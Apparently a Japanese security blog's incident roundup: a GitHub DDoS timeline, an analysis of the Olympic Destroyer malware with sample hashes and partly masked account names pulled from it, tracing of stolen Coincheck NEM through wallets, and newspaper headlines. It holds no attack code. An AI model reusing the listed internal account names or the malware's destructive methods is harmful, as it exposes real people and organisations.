2018年3月1日 2時21分頃から発生約1.35Tbps(毎秒126.9百万パケット)約6分程度のサービス障害
2018年3月1日 3時頃から発生約400Gbps無し
日時Githubの対応
2018年3月1日 2時21分頃Github.comで障害検知。
Githubの施設の1つで使用されるインバウンドの帯域幅が100Gbpsを超過したことからアカマイへのトラフィック移動を決定。
2時26分頃ChatOpsツールを用いてBGPアナウンスメントの取り消し、及びアカマイ経由とするコマンドを実行。
2時30分頃サービスの障害が回復。
2時34分頃Internet exchangeへのルートはフォローアップとして引き継ぎ。
(5) RansomDoSの動き

(6) Arbor Networksが1.7 Tbps規模の攻撃を観測

Today, NETSCOUT Arbor can confirm a 1.7Tbps reflection/amplification attack targeted at a customer of a U.S. based Service Provider has been recorded by our ATLAS global traffic and DDoS threat data system.

セキュリティベンダの観測情報等

その他の関連記事/情報

更新履歴

*1memcached悪用のDDoS攻撃で1.7Tbpsを確認、米アーバーネット,日経xtech,2018年3月7日アクセス

平昌オリンピック開会式中のシステム障害についてまとめてみた

2018年2月8日より韓国で開催されている2018年平昌冬季五輪で、2018年2月9日の開会式直前にシステム障害等のトラブルがあったと報じられました。

ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
2018年2月9日19時15分頃平昌五輪組織委員会の内部でシステムトラブルが発生。
開会式会場でWifi等が使用不可。
〃 20時平昌冬季五輪大会開会式が始まる。
2018年2月10日9時頃公式Webサイトの接続障害が解消。(現地時間8時)
〃 午前平昌五輪組織委員会が定例会見でシステムの復旧が済んだことと詳細調査中とコメント。
2018年2月11日平昌五輪組織委員会が障害原因がサイバー攻撃によるものと明らかにした。*1
2018年2月24日平昌五輪組織委員会は開会式がサイバー攻撃を受けWifi利用に影響が出たと発表。

開会式に関連して確認されたトラブル事象

(1) メインプレスセンターで開会式の映像視聴が中断
(2) 公式Webサイトの一部で接続障害
(3) インターネット、Wifiが利用不可
(4) 撮影で使われる予定のドローンの飛行停止

システム障害の原因

システム破壊マルウェア「Olympic Destroyer」

マルウェアの呼称
ベンダ呼称
CiscoOlympic Destroyer
MicrosoftTrojan.Win32/Samcrex
SymantecTrojan.Olydestroy
TrendMicroTROJ_OlympicDestroyer
マルウェアの挙動
資格情報の窃取ブラウザ、システムそれぞれから資格情報を窃取する機能がある。
ブラウザはIE,Firefox、Chromeを対象としている。
・システムはMjmikatzでも行われているLSASSから資格情報の窃取を試みる。
ネットワーク内への拡散・ARPテーブルのスキャンを行う。
・WMIを用いてディレクトリ内の全てのシステムリストの取得を試みる。
・ PsExec、WMIを用いて拡散する。
システム破壊・vssadminを用いてシステム上のすべてのシャドウコピーを削除する。
・wbadminを用いてバックアップカタログを削除する。
・bcdeditを用いてスタートアップ修復を無効化する。
・wevtutilを用いてイベントログを削除する。
・システム上のすべてのサービスを無効にする。
・ファイル共有で書き込み権限があるファイルを0で上書きする。
・全ての変更を加えた後にシステムのシャットダウンを実行する。

ハードコードされている資格情報と見られる文字列

以下はVTへのアップロードが確認できた検体9種のサマリー

検体サンプルハードコードされた資格情報VTアップロード日時/国ファイル名コンパイル時間
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c852018-02-09 13:33:25(フランス)_abl.exe2017-12-27 09:03:48
3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c28個2018-02-09 13:42:46(フランス)_mpw.exe2017-12-27 11:39:22
d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d9150164個2018-02-09 14:28:40(オーストリア)_wun.exe.vir2017-12-27 11:39:22
28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc10個2018-02-09 14:42:59(フランス)_smj.exe2017-12-27 11:39:22
19ab44a1343db19741b0e0b06bacce55990b6c8f789815daaf3476e0cc30ebea2018-02-09 21:58:48(フランス)yrgah.exe2017-12-27 11:44:30
f188abc33d351c2254d794b525c5a8b79ea78acd3050cd8d27d3ecfc568c29362018-02-12 16:03:23(フランス)file2017-12-27 11:44:35
edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb944個2018-02-09 21:53:49(韓国winlogon.ex_2017-12-27 11:44:47
a5f59327be5e45f47fb37c1b4922cb2edba8fe0bde657acf1a1502ae34816cb145個2018-02-09 21:58:58(フランス)_mfy.exe2017-12-27 11:44:47
23e5bb2369080a47df8284e666cac7cafc207f3472474a9149f88c1a4fd7a9b02018-02-09 13:46:23(フランス)olymp.exe2018-02-09 10:42:19

感染経路に関する情報

関係組織の対応

平昌五輪組織委員
AtoS
IOC
専門チーム

参考情報


検体情報

Olympic Destroyerのサンプル
edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9
d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016 
3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2
28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc
19ab44a1343db19741b0e0b06bacce55990b6c8f789815daaf3476e0cc30ebea
23e5bb2369080a47df8284e666cac7cafc207f3472474a9149f88c1a4fd7a9b0
3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2
a5f59327be5e45f47fb37c1b4922cb2edba8fe0bde657acf1a1502ae34816cb1
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85
d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016
edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9
f188abc33d351c2254d794b525c5a8b79ea78acd3050cd8d27d3ecfc568c2936 

その他関連情報

マルウェア内にハードコードされた文字列
ww930\\deb00999
WW930\\w99a1mf0
WW930\\A425253
ATVIES2BQA\\bofh-ro
ww930\\deb00999
WW930\\w99a1mf0
RUVOZ990FILSRV\\MICROSOFT$DPM$Acct
WW930\\a593309
emea\\*****.************
MicrosoftOffice16_Data:SSPI:*****.************@atos.net\\(null)
10.95.47.55\\WW930\\reportadmin
TEQUILABOOMBOOM\\janettedoe
ww930\\deb00999
WW930\\w99a1mf0
RUVOZ990FILSRV\\MICROSOFT$DPM$Acct
WW930\\a593309
emea\\\*****.************
MicrosoftOffice16_Data:SSPI*****.************@atos.net\\(null)
10.95.47.55\\WW930\\reportadmin
WW930\\A685898
(null)\\********.*********@atos.net
MicrosoftOffice16_Data:SSPI:********.*********@atos.net\\(null)
Pyeongchang2018.com\pcadmin
Pyeongchang2018.com\PCA.GMSAdmin
Pyeongchang2018.com\cert01
g18.internal\minadmev
g18.internal\adm.****.*******
g18.internal\adm.*****.*********
Pyeongchang2018.com\PCA.lyncadmin
Pyeongchang2018.com\PCA.lyncadmintest
Pyeongchang2018.com\PCA.SMSAdmin
Pyeongchang2018.com\addc.siem
Pyeongchang2018.com\jinsik.park
Pyeongchang2018.com\pca.infradmin
Pyeongchang2018.com\PCA.KASAdmin
Pyeongchang2018.com\PCA.OMEGAdmin
Pyeongchang2018.com\PCA.WEBAdmin
Pyeongchang2018.com\PCA.SDAdmin
Pyeongchang2018.com\pca.sqladmin
Pyeongchang2018.com\PCA.giwon.nam
Pyeongchang2018.com\svc_all_swd_installc
Pyeongchang2018.com\PCA.spsadmin
Pyeongchang2018.com\test
Pyeongchang2018.com\adm.pms
Pyeongchang2018.com\COS.SQLAdmin
Pyeongchang2018.com\pca.dnsadmin
Pyeongchang2018.com\PCA.imadmin
Pyeongchang2018.com\pca.perfadmin
Pyeongchang2018.com\jaesang.jeong6
Pyeongchang2018.com\pca.dnsadmin2
Pyeongchang2018.com\pca.cpvpnadmin
Pyeongchang2018.com\pca.dmzadmin
Pyeongchang2018.com\PCA.ERPAdmin
Pyeongchang2018.com\PCA.HRAdmin
Pyeongchang2018.com\pca.ssladmin
Pyeongchang2018.com\pca.mgadmin
Pyeongchang2018.com\PCA.SSLVPNAdmin2
Pyeongchang2018.com\pmo_admin
Pyeongchang2018.com\admin
Pyeongchang2018.com\web_admin
Pyeongchang2018.com\cos_admin
Pyeongchang2018.com\gms_admin
Pyeongchang2018.com\lync.admin
Pyeongchang2018.com\crm_admin
Pyeongchang2018.com\ips.admin
Pyeongchang2018.com\mail.admin
Pyeongchang2018.com\pcadmin
Pyeongchang2018.com\PCA.GMSAdmin
Pyeongchang2018.com\cert01
g18.internal\minadmev
g18.internal\adm.****.*******
g18.internal\adm.*****.*********
Pyeongchang2018.com\PCA.lyncadmin
Pyeongchang2018.com\PCA.lyncadmintest
Pyeongchang2018.com\PCA.SMSAdmin
Pyeongchang2018.com\addc.siem
Pyeongchang2018.com\jinsik.park
Pyeongchang2018.com\pca.infradmin
Pyeongchang2018.com\PCA.KASAdmin
Pyeongchang2018.com\PCA.OMEGAdmin
Pyeongchang2018.com\PCA.WEBAdmin
Pyeongchang2018.com\PCA.SDAdmin
Pyeongchang2018.com\pca.sqladmin
Pyeongchang2018.com\PCA.giwon.nam
Pyeongchang2018.com\svc_all_swd_installc
Pyeongchang2018.com\PCA.spsadmin
Pyeongchang2018.com\test
Pyeongchang2018.com\adm.pms
Pyeongchang2018.com\COS.SQLAdmin
Pyeongchang2018.com\pca.dnsadmin
Pyeongchang2018.com\PCA.imadmin
Pyeongchang2018.com\pca.perfadmin
Pyeongchang2018.com\jaesang.jeong6
Pyeongchang2018.com\pca.dnsadmin2
Pyeongchang2018.com\pca.cpvpnadmin
Pyeongchang2018.com\pca.dmzadmin
Pyeongchang2018.com\PCA.ERPAdmin
Pyeongchang2018.com\PCA.HRAdmin
Pyeongchang2018.com\pca.ssladmin
Pyeongchang2018.com\pca.mgadmin
Pyeongchang2018.com\PCA.SSLVPNAdmin2
Pyeongchang2018.com\pmo_admin
Pyeongchang2018.com\admin
Pyeongchang2018.com\web_admin
Pyeongchang2018.com\cos_admin
Pyeongchang2018.com\gms_admin
Pyeongchang2018.com\lync.admin
Pyeongchang2018.com\crm_admin
Pyeongchang2018.com\ips.admin
Pyeongchang2018.com\mail.admin
TEQUILABOOMBOOM\janettedoe

文字列は一部マスキングしています。

当該事象に関連する記事

日付新聞社見出し
2018年2月10日(土)夕刊読売新聞五輪施設システム障害 開会式前 組織委「安全に影響なし」
2018年2月14日(水)朝刊産経新聞平昌開会式にサイバー攻撃(一面記事)

更新履歴

*1平昌冬季五輪、サイバー攻撃受けていた 攻撃元については明かされず,AFP通信,2018年2月11日アクセス

*2IOC·평창조직위, 사이버 공격 확인…안전 위해 세부내용 비공개,Yonhapnews,2018年2月11日アクセス

*3組織委サーバーにサイバー攻撃、入場券の印刷にも影響,TBS,2018年2月11日アクセス

*4개회식 때 평창조직위 홈피 사이버 공격…10일 오전 복구,SBS,2018年2月11日アクセス

*5개회식 때 평창조직위 홈피 사이버 공격..10일 오전 복구,daum.net,2018年2月11日アクセス

*6平昌冬季五輪、開会式のさなかにネットがダウン 当局が調査,AFP通信,2018年2月11日アクセス

*7Cyber Attack Disrupts Winter Olympics Website During Opening Ceremony,HackRead,2018年2月12日アクセス

*8'Olympic Destroyer' malware targeted Pyeongchang Games: firms,Reuters,2018年2月14日アクセス

*9平昌五輪 開会式当日にサイバー攻撃 入場券は目標達成,毎日新聞,2018年2月25日アクセス

*10Atos, IT provider for Winter Olympics, hacked months before Opening Ceremony cyberattack,cyberscoop,2018年2月16日アクセス

*11평창올림픽 개회식 당시 사이버 공격은 해커 소행…무대 난입자는 한국계 미국인,아시아투데이、2018年2月11日アクセス

Coincheck不正送金に関連する一部のウォレットを調べてみた

Coincheckの不正送金事案の不正送金元から流出しているXEMの行方について、2018年2月6日頃からHidden Service上で不正送金されたXEMとビットコイン、ライトコインとの換金が可能な取引所を開設されました。

またこの取引所開設に合わせて以下の関連する報道が出ています。

ここではこれらに関連するXEMの動きについて調べた内容をまとめます。またまとめた情報は2月11日5時頃のデータに基づくものであり、適宜更新します。

取引所とみられるウォレットとXEMの動き

コインチェックのウォレットから送金された526,300,010 XEMは複数のウォレットに分散されました。この内、約300万XEMが複数のウォレットに送金されましたが、2月7日頃から送金先のウォレット数が増加する傾向を示しました。

多数のウォレットに送金をしているものとして主に次が該当します。

ウォレット送金件数送金総額送金期間
NA6OMO3K2NXTVXUWH7UIM4KRXSVHNKA4DEYCSV4H14件約53,754 XEM2018/2/6 22:08:09 〜 2018/2/8 21:03:13
NCVPRFXRIDDF7PXKBF6CKKI76H3M5H5TSXT5K575275件約4,993,382 XEM2018/2/8 0:46:01 〜 2018/2/10 3:48:20
NCMWFB2PF7FW5I27YVIIXB676S6XR4JG3IYY6YGH237件約6,742,526 XEM2018/2/9 20:04:02 〜 2018/2/11 2:30:19
NCQ7XXA6QXZJXOPYRD2UXPTNV3MHR527JUQHXGHE114件約852,627 XEM2018/2/10 14:08:01 〜 2018/2/12 1:03:58
NAKHTVQ3ZFFXJVLRL6ZUKQ7SKZCP2TD5RQVMX4HZ156件約1,968,717 XEM2018/2/11 5:30:03 〜 2018/2/11 15:20:01
NA7O2PTEP5XHJ5DNDTLJB232L33QCDTVECRL2QZO101件約239,943 XEM2018/2/11 17:24:31 〜 2018/2/12 1:10:02
NAJOBVTX5OHU6O64AWA62R65J6VBOXNGYJPA74QX142件約869,278 XEM2018/2/12 1:03:58 〜 2018/2/12 13:44:01
NAZZKT62TPIMS5NPZLFNZSMZX65V3OYVBZJM3YNS170件約556,534 XEM2018/2/12 14:24:03 〜 2018/2/13 4:38:01
NCIM74WZN2DO4DGJMOCAPCHIIWXODLFKRE36SZX5125件約592,879 XEM2018/2/13 4:50:01 〜 2018/2/13 16:04:02
ND5EAK6USPLJLJNJGLF74SEDJDYXWJ4OGOKT7H2A1,029件約30,332,830 XEM2018/2/13 16:18:02 〜 2018/2/16 3:46:02
NB3VV45GCK5SMINKYZIN7LFUYPOCY7BDO3GLX4YT1,586件約80,352,438 XEM2018/2/16 4:00:03 〜 2018/2/21 2:35:37
NC4KHXSB3DYQLQZLARVRLBHMS5CMIIV4ACGXKOB2576件約20,125,262 XEM2018/2/21 2:42:01 〜 2018/3/2 2:39:35
NDAC2G5W5E6BK55WWXSWMNTWFU6KY6OHQEQ6JY2A4件約166,368 XEM2018/3/2 2:37:44 〜 2018/3/2 16:28:34
NBEAUKXJLBJXXTPXN2OPIX3LZQWWZA56IQO2P5S37,587件約384,932,680 XEM2018/3/2 3:32:03 〜 2018/3/22 18:47:56
合計12,116 件約532,774,410 XEM

(2018年3月23日1時時点)

日付別の推移は以下の通り。

f:id:Kango:20180323003745p:image

f:id:Kango:20180321054336p:image

ウォレットの残高はHidden Service上に設置された取引所に示された取引可能額を示したと見られる「Available」と数値が一致しているとの指摘があります。

また、コインチェックのXEMを二次送金したウォレットの多くは動きがない状態が続いていましたが、2月9日頃よりこれらのウォレットでも先ほど示したウォレットに対して送金する動きが出始めました。

先ほどのウォレットへのXEMの入金の流れを整理したものが次の図です。

f:id:Kango:20180303044843p:image

送金を受けているウォレット側の動き

piyokangoが把握してるだけでも150以上のウォレットが送金を受けているため数が多く全部は追いかけきれていませんが、Yobitとみられる仮想通貨取引所のウォレット「NBRT3YQTVHLTYBDUXH2HHURI5KCYDWRWJ63YWIGG」へ送金する動きが報告されています。

この時 確認した範囲では次のウォレットが先ほどのウォレットから送金された全体の7割近くを占めており、その内の4つでYobitとみられるウォレットへの送金を確認しました。

送金を受けていたウォレット TOP5入金総額Yobitとみられるウォレットへの送金額
NACPIG2TG5FS6EUFX3IEXROXQG3N6ERMLLASBV64約3,358,361 XEM約3,062,459 XEM
NCK4WCEOR2SBWJ4O45SNEECQVVUM3AC6DTMRL4BT約2,681,754 XEM約2,381,743 XEM
NDUZU7FEF5XXAE3DT4UTCTYQQHYK2ZJLCRCASP4I約566,252 XEM約566,243 XEM
NDDENEUZIWEAOWC6B3VTAA3D4GJMJHTV2BYPY7JE約464,472 XEM無し
NB2Z6LKVWKNWDONIK3AU7HRMKYA3LCUOJAVQQJJW約399,953 XEM約39,9952 XEM

YOBITの取引所で取り扱い量ですが、ここ数日のビットコインへの換金量が相当程度増えているようです

f:id:Kango:20180210054504p:image

2月9日 送金ミスしても返してくれる?

先ほどのTOP5にランクインしているウォレット「NDUZU7FEF5XXAE3DT4UTCTYQQHYK2ZJLCRCASP4I」が送金先を間違えたらしく、換金元のウォレットへ37,258 XEMを送ってしまい、返してくれとメッセージを送っていました。

メッセージを送って6時間ほど経った後に手数料が引かれることなく同額が返されていました。

f:id:Kango:20180210054458p:image

2月9日 YobitがXEMの受付を停止し、HitBTCに移った?

f:id:Kango:20180211073645p:image

2月12日時点で送金された全体の9割であたる送金先上位100ウォレットを確認したところ、45の二次送金先のウォレットを確認した。送金額トップ1位はYobit(NBRT3YQTVHLTYBDUXH2HHURI5KCYDWRWJ63YWIGG)、2位はHitBTC(NBX3QKZJV2UPO3NJ5ULTFW2V5EE4N2I5N2REX7PO)とみられるウォレットに送金されている模様。

二次送金先ウォレット送金額送金件数
NBRT3YQTVHLTYBDUXH2HHURI5KCYDWRWJ63YWIGG (Yobit)約9684317.1 XEM269件
NBX3QKZJV2UPO3NJ5ULTFW2V5EE4N2I5N2REX7PO (HitBTC)約1832011.6 XEM66件
NAWEPZH4KEVVO7FONK3QDV4H3FC2R6DUXBBG6ODQ約505370.0 XEM20件
NCGNOKGD5A3EM7QWG4NSHV24YS5KUJWKI4WC5XF3約463971.0 XEM2件
NCEOXD2NNTMXBSFZ5JGAI7H3I5FQKV3HR3DVJTIP約355660.0 XEM21件
その他約886576.1 XEM180件

Yobit,HitBTCとみられる取引所への日別の推移をまとめると次の通りとなった。

f:id:Kango:20180212130618p:image

2月11日 警視庁が取引所で換金した男性聴取の報道

2月17日 突出した取引高の2ウォレットの存在

2月10日頃より、突出した取引高を持つウォレット2つが確認されている。この2つだけで2月17日時点で取引されたとみられるXEM総額の内、約6割近くを占めている状況。

以下は2月19日6時頃の状況。

Noウォレット入金総額
1NBLNAYJ6BXEZ5MEKLRHCPVZ6V3XG3IMOUOJMS7KJ約36,773,293 XEM
2NCS7SDTQPSBTQJGTTJXPXV6FRBQTBTPHHRNLNFDC約13,498,773 XEM

この2つのウォレットから大きな金額が取り扱われた二次送金先ウォレットをまとめると次の通り。(2月17日時点)

二次送金先ウォレットNo.1からの送金額No.2からの送金額
NCITYN5JXPCC55IPZADE7UWJFYUPCMIJ66NXCCEP7490570 XEM
NCYAVMNQOZ3MZETEBD34ACMAX3S57WUSWAZWY3DW6540789 XEM
NC6SNCGD2WT44BEOUQRWYTBZMGJMLO25UT5DNBWN6395455 XEM
NCEOXD2NNTMXBSFZ5JGAI7H3I5FQKV3HR3DVJTIP5104608 XEM
NB4MJ4MZXNAVN3ZTNHBMR6WYE27NDX3OD7HTRXMU1984548 XEM
ND2JRPQIWXHKAA26INVGA7SREEUMX5QAI6VU7HNR1633799 XEM1336417 XEM
NBFV7EREDJRYHJ3ODEIMMF2SSXT37D7ZFFN47UDW1551430 XEM
NBZMQO7ZPBYNBDUR7F75MAKA2S3DHDCIFG775N3D185919 XEM
NBX3QKZJV2UPO3NJ5ULTFW2V5EE4N2I5N2REX7PO665537 XEM478743 XEM
NCCFO5QDFV5FS3BTBPEU2QO6UHZD7PHGFNCPISDL90788 XEM

尚、この2つのアドレス間での送金も確認されており、2017年12月24日2018年2月14日15日に合計1010XEMの送金が行われている。

この内、12月24日の取引では「С наступающим」と書かれたロシア語のメッセージ(英語訳:Holiday greetings)が残っている。

f:id:Kango:20180219063026p:image

2月20日 取引所のXEM 在庫切れが発生?

2月20日午後より取引所で交換されていたとみられるXEMの在庫がつきかけた状態となっていたとみられ20日は17時42分の送金を最後に翌1日まで動きがなかった。Avairableの数値も二桁程度まで落ち込んでいたのが観測されています。

翌日21日2時過ぎにNC4KHXSB3DYQLQZLARVRLBHMS5CMIIV4ACGXKOB2から100万XEMが送金された。

100万XEMがNC4KHXSB3DYQLQZLARVRLBHMS5CMIIV4ACGXKOB2から送金される手前で、不正送金が行われた二次送金先NA7SZ75KF6ZKK267TRKCJDJBWP5JKIC2HA5PXCKWから2000万XEMの送金を受けていました。さらに40分程度たった3時過ぎにも2000万XEMが改めて送金されています。

2月21日 HuobiでXEMの受け入れ停止、取引量も急減

2月20日頃にHuobiがNEM.io財団のコミュニティ関連の問題を受けてとして、XEMの入出金を停止する措置を取ったことがアナウンスされました。

f:id:Kango:20180224023543p:image

取引所の送金元とみられるウォレットからの送金額も21日を境に金額、件数ともに急減しています。

不正送金に関係なく、この措置の対象範囲は全ユーザーに及んでいる模様。

2月25日 Coinpaymentsからの換金の動き継続、送金先の取引所に変化

3月2日 しんぶん赤旗がZaifへ大量送金と報道

3月6日 XEMの送金に関してテックビューロがコメント

3月6日 CoinpaymentsがメンテナンスとしてXEMの受け入れを一時停止

3月21日 二次送金先のウォレット在庫が0に

f:id:Kango:20180323003946p:image:w450

3月22日 取引所の販売終了

f:id:Kango:20180323003951p:image:w450

集計から除外したウォレット

集計にあたって以下の送金を行っている当事者やMosaicを送っているウォレットは金額や件数から除外しています。送金されるかどうかを検証している人などもいて十分に精査が出来ていないため除外対象は増えるかもしれません。

NC4C6PSUW5CLTDT5SXAGJDQJGZNESKFK5MCN77OG
NCM6WE7SJFDVTLSPTMZGBUZUETDYINITILS3DCIZ
NBVWA3S2PAXPXT7X52HKEKNDVNMBG3ZATYED6MIY
NBGWETQN4Q3FETCG7JCBP5S22RI5643JBSYVHA7Z
NBXIJZQS66IZ4KYV3QHM74MZWQCU2B6R3H65MPSM
NA6OMO3K2NXTVXUWH7UIM4KRXSVHNKA4DEYCSV4H
NCVPRFXRIDDF7PXKBF6CKKI76H3M5H5TSXT5K575
NDZZJBH6JZPYSWRPRYHALLWMITWHOYTQGXR53HAW
ND3BDYXAYOY7M5XR2EIRPAG43Z3LSDGQXJOPY4BK
NCMWFB2PF7FW5I27YVIIXB676S6XR4JG3IYY6YGH
NCP733VKRNJ2P2MU2Y7SHZ2OBGHMDY5A4KBY5HPH
NCU63AYO6RS2ISG4UEP5CALTKVQOB4FUTYIYXUAV
NDGLD5YU72S2XSUQ3XBBIQRA6BIX5JACZ3KO55KO
NCTWFIOOVITRZYSYIGQ3PEI3IMVB25KMED53EWFQ
NC2EWSUL5NQKJ2R7CTRHU73YPLXLK5YEHC4HDT6X
NAKHTVQ3ZFFXJVLRL6ZUKQ7SKZCP2TD5RQVMX4HZ
NCQ7XXA6QXZJXOPYRD2UXPTNV3MHR527JUQHXGHE
NAJOBVTX5OHU6O64AWA62R65J6VBOXNGYJPA74QX
NA7O2PTEP5XHJ5DNDTLJB232L33QCDTVECRL2QZO
NAZZKT62TPIMS5NPZLFNZSMZX65V3OYVBZJM3YNS
NCIM74WZN2DO4DGJMOCAPCHIIWXODLFKRE36SZX5
ND5EAK6USPLJLJNJGLF74SEDJDYXWJ4OGOKT7H2A
NB3VV45GCK5SMINKYZIN7LFUYPOCY7BDO3GLX4YT
NC4KHXSB3DYQLQZLARVRLBHMS5CMIIV4ACGXKOB2
NDAC2G5W5E6BK55WWXSWMNTWFU6KY6OHQEQ6JY2A
NBEAUKXJLBJXXTPXN2OPIX3LZQWWZA56IQO2P5S3

更新履歴

*1「盗難NEM、Zaifに大量流入」にZaifがコメント 「情報を公開すると、捜査を阻害する」,ITmedia,20118年3月6日アクセス

Coincheckの不正送金関連の新聞見出しをまとめてみた

Coincheckの不正送金事案のまとめに掲載していた見出し一覧のまとめです。

件数が多いため別のページに移しました。

2018年1月27日(土)朝刊
新聞社見出し
読売新聞仮想通貨揺らぐ信頼 巨額流出 投資家離れの可能性
仮想通貨580億円流出 NEM取引所「コインチェック」
朝日新聞朝刊仮想通貨 580億円流出 大手取引所不正アクセス被害(一面記事)
580億円 8時間で流出 ネット遮断の対策とらず
毎日新聞仮想通貨 580億円不正流出 国内取引所サイバー攻撃
東京新聞仮想通貨580億円分消失 コインチェック「不正送金された」
日本経済新聞仮想通貨580億円分流出 取引所コインチェック「不正アクセス」(一面記事)
産経新聞仮想通貨 580億円分消失 一時売買停止 不正に外部送金 コインチェック(一面記事)
仮想通貨 盗難・消失 後絶たず 対策強化もいたちごっこ
「お金返して」表情硬く 仮想通貨消失 会社前に利用者殺到
2018年1月27日(土)夕刊
新聞社見出し
読売新聞仮想通貨流出 ネット遮断せず管理 不正アクセス標的に(一面記事)
「お金 返るのか」仮想通貨流出 利用客 不安と怒り セキュリティ対策 後手
朝日新聞仮想通貨入出金停止続く コインチェック 資産戻るか不明(一面記事)
毎日新聞仮想通貨流出 顧客補償 めど立たず 金融庁が情報収集(一面記事)
東京新聞仮想通貨流出 顧客資産 返せぬ恐れ コインチェック「ネム」以外も被害か(一面記事)
日本経済新聞コインチェック580億円分流出 顧客資産返せぬ恐れ(一面記事)
安全性「話が違う」仮想通貨流出、利用者憤り
利用者保護 後回しに 仮想通貨 ハッキング対策不十分
2018年1月28日(日)朝刊
新聞社見出し
読売新聞仮想通貨流出 金融庁 取引所処分へ コインチェック 一部業務停止も(一面記事)
仮想通貨とは?ネット上の「お金」国は管理せず
大甘管理 流出招く コインチェック ネット遮断せず 把握まで8時間
流出被害「全額返金」表明 コインチェック 時期は明示せず
操作長期化も 取引追跡に時間
朝日新聞仮想通貨NEM 甘い安全管理 コインチェック ネット遮断せず580億円分失う(一面記事)
毎日新聞仮想通貨流出 26万人に460億円返金方針 コインチェック ネット遮断せず管理
ずさん管理 次々露呈 安全二の次 運営拡大
仮想通貨流出 全取引所に注意喚起 金融庁、安全管理を要請
「顧客優先で補償検討」コインチェック会見の一問一答
東京新聞コインチェック仮想通貨流出「リスク以前のお粗末さ」脆弱な態勢 不正の標的
市場 一時6兆円縮小 コインチェック返金へ
仮想通貨流出 記者も購入 危うさ実感 「自己責任」一寸先は闇
取引全体の管理者ない仮想通貨 不測の事態 保証なし
日本経済新聞全取引所に点検要請 仮想通貨流出 金融庁、管理体制など(一面記事)
甘い管理放置 流出招く 仮想通貨市場に冷や水
仮想通貨「NEM」とは
不正侵入者 特定難しく仮想通貨流出 警視庁が情報収集
産経新聞コインチェック 顧客資産 返せぬ恐れ 仮想通貨流出 警視庁、捜査へ(一面記事)
仮想通貨流出 常時ネット接続、低い安全性 利用者保護後回し
一気に6兆円乱高下繰り返し "夢の通貨" 投機先行
各国高まる規制機運
2018年1月29日(月)朝刊
新聞社見出し
読売新聞仮想通貨流出 「返金自社資産で賄う」 コインチェック 金融庁に方針報告(一面記事)
返金方針 安堵と不満 コインチェック 円換算「実質的に損」
朝日新聞NEM流出 改善命令へ 金融庁 返金 追加説明を要求(一面記事)
毎日新聞仮想通貨流出 海外から不正アクセス 金融庁、改善命令へ 返金時期明言せず(一面記事)
東京新聞仮想通貨流出 改善命令へ コインチェック 業務停止も視野(一面記事)
仮想通貨流出 コインチェック 取引所申請中 みなし業者
「返金しても事業継続可能」取締役一問一答
日本経済新聞仮想通貨流出 コインチェック 金融庁きょう改善命令(一面記事)
自主規制へ 団体新設(一面記事)
仮想通貨 規制どう作る 取引所・乱高下… 焦点絞りづらく
産経新聞仮想通貨流出で改善命令へ コインチェック「26マン人に460億円返金」(一面記事)
金融庁、発展促進から規制強化に 利用者保護 登録基準見直しも(一面記事)
2018年1月29日(月)夕刊
新聞社見出し
読売新聞コインチェック 仮想通貨流出に改善命令 金融庁 安全対策不十分(一面記事)
朝日新聞資金洗浄対策も懸念 コインチェック社 金融庁、改善命令(一面記事)
毎日新聞金融庁が改善命令 仮想通貨流出 コインチェック(一面記事)
東京新聞コインチェックに改善命令 金融庁、管理強化求める 警視庁は任意聴取へ
日本経済新聞コインチェックに改善命令 金融庁 不正アクセス対策不備(一面記事)
2018年1月30日(火)朝刊
新聞社見出し
読売新聞仮想通貨8ルートで流出 警視庁 追跡遅らせる狙いか(一面記事)
発覚3日で改善命令 コインチェックに 原因報告求める 金融庁(一面記事)
コインチェック流出 利用者保護が不十分 仮想通貨 法整備追い付かず
仮想通貨流出 利用者保護の軽視が目に余る(社説)
朝日新聞仮想通貨 全取引所調査へ 金融庁 安全管理徹底促す
毎日新聞警視庁、社員から聴取 仮想通貨流出 金融庁、改善命令 コインチェック(一面記事)
顧客保護軽視に不信感 金融庁改善命令 返金実現不透明
資金の移動「追跡可能」
仮想通貨ネムの不正流出 顧客保護の軽視が招いた(社説)
東京新聞金融庁 仮想通貨 全取引所調査へ コインチェック改善命令(一面記事)
関係者から聴取 警視庁本格捜査(一面記事)
狙われた取引所の「金庫」 コインチェック仮想通貨流出 管理未熟 暗号一つで接続
日本経済新聞流出 20分で576億円 半日近く気づかず コインチェックに改善命令
仮想通貨 育成に死角 金融庁、安全網の整備課題
韓国中国は規制強化 国際ルール策定 G20で3月議論
サイバーセキュリティ銘柄 短期マネー流入 仮想通貨流出受け
産経新聞仮想通貨流出で改善命令 金融庁 コインチェック処分(一面記事)
警視庁、幹部ら聴取 本格捜査へ(一面記事)
仮想通貨の流出安全対策がずさんすぎる(社説)
仮想通貨 ネット上で商品購入や送金…1500種 時価総額は55兆円
「秘密鍵」導入も不十分
コインチェック業務改善命令 「事業継続」いばらの道 登録審査厳しく
メガバンクにも打撃 仮想通貨流出 イメージ悪化懸念 「銀行とは別物」火消しに躍起
2018年1月30日(火)夕刊
新聞社見出し
朝日新聞「イノベーションと保護のバランス大事」麻生氏、仮想通貨規制に見解
毎日新聞仮想通貨「管理強化」麻生金融相 立ち入り検討
東京新聞8アドレスに分散送金 仮想通貨 20分間でほぼ全額流出
日本経済新聞他業者も検査検討 金融相、仮想通貨流出で
2018年1月31日(水)朝刊
新聞社見出し
読売新聞仮想通貨 別アドレスへ3次送金 576億円、20分で流出
取引の追跡可能 「台帳」に記録
朝日新聞NEM580億円流出 19分 発覚まで11時間超 10口座に分散 通貨移動困難 塩漬けの恐れ(一面記事)
